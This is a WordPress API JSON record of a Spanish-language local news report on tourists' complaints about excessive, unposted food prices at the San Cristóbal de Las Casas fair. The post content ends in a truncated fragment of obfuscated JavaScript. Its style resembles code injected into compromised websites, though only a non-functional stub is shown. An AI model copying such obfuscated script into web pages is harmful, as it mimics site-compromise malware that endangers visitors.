{"id":9526,"date":"2023-04-13T20:03:31","date_gmt":"2023-04-13T20:03:31","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=9526"},"modified":"2023-04-13T20:03:32","modified_gmt":"2023-04-13T20:03:32","slug":"se-quejan-turistas-por-los-precios-de-comidas-en-la-feria-de-san-cristobal","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=9526","title":{"rendered":"Se quejan turistas por los precios de comidas en la Feria de San Crist\u00f3bal"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/04\/WhatsApp-Image-2023-04-13-at-12.04.01-PM-1024x768.jpeg\" alt=\"\" class=\"wp-image-9527\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/04\/WhatsApp-Image-2023-04-13-at-12.04.01-PM-1024x768.jpeg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/04\/WhatsApp-Image-2023-04-13-at-12.04.01-PM-300x225.jpeg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/04\/WhatsApp-Image-2023-04-13-at-12.04.01-PM-768x576.jpeg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/04\/WhatsApp-Image-2023-04-13-at-12.04.01-PM-1536x1152.jpeg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/04\/WhatsApp-Image-2023-04-13-at-12.04.01-PM.jpeg 1600w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez\/Corresponsal<\/p>\n\n\n\n<p>13 de Abril del 2023. San Crist\u00f3bal de Las Casas.- Turistas y ciudadanos de San Crist\u00f3bal, hicieron un llamado a la Procuradur\u00eda Federal del Consumidor (Profeco) a acudir a las instalaciones del Parque de la Feria en esta ciudad, ya que denuncian p\u00fablicamente cobros a exceso y no contar con precios reales de los alimentos que ofrecen.<\/p>\n\n\n\n<p>\u201cQuisiera hacer una denuncia, la noche de hoy vine a la feria de San Crist\u00f3bal de Las Casas, mi familia y yo fuimos a un puesto de los que est\u00e1n a lado de los primeros ba\u00f1os, y nos cobraron $840.00 sin propina, y realmente fue una comida decepcionante, y realmente nada llenador, le dejo mi recibo para que vea la estafa que se est\u00e1 viviendo en la feria de la ciudad\u201d, citan en una denuncia compartida.<\/p>\n\n\n\n<p>Los turistas que argumentaron ser de la Ciudad de M\u00e9xico, se sintieron decepcionados, ya que durante su visita a esta ciudad y en lugares m\u00e1s elegantes, les hab\u00edan hecho cobros tan elevados, y \u201crealmente jam\u00e1s pens\u00e9 llevarme est\u00e1 decepci\u00f3n\u201d.<\/p>\n\n\n\n<p>Detallan que fueron 4 platillos, 2 burritos, una gringa y una orden de tacos, 4 bebidas, 2 aguas de pi\u00f1a, una botella de agua y una coca, por lo que consideran excesivo el precio.<\/p>\n\n\n\n<p>\u201cEl \u00fanico precio que est\u00e1 expuesto es el de los \u00f3rdenes de tacos de al pastor, y justo estuvimos busc\u00e1ndolos a los de la PROFECO en la feria y no pudimos dar con ellos, y que yo tenga entendido, tienen que tener el precio en exhibici\u00f3n. Haaaaa y si es qu\u00e9 hay alguien ah\u00ed con vida en el PROFECO ser\u00eda bueno echaran un su vuelta as\u00ed como que no queriendo por qu\u00e9 no creo que solo sean estas persona que se lo anden quejando de los abusos de algunos comerciante\u201d, citan.<\/p>\n\n\n\n<p>De la misma forma, nos hicieron llegar notas de pagos por consumo en pedazos de hojas, sin nombres del negocio, raz\u00f3n social, y menos del local comercial, y \u00fanicamente letras con el nombre de los productos y precios, el total, y sugerencias de la propina del 10 por ciento con cantidades de mil 610, y mil 825 pesos.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez\/Corresponsal 13 de Abril del 2023. San Crist\u00f3bal de Las Casas.- Turistas y ciudadanos de San Crist\u00f3bal, hicieron un llamado a la Procuradur\u00eda Federal del Consumidor (Profeco) a acudir a las instalaciones del Parque de la Feria en esta ciudad, ya que denuncian p\u00fablicamente cobros a exceso y no contar con precios reales de &hellip;<\/p>\n","protected":false},"author":2,"featured_media":9527,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-9526","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/9526","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=9526"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/9526\/revisions"}],"predecessor-version":[{"id":9528,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/9526\/revisions\/9528"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/9527"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=9526"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=9526"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=9526"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}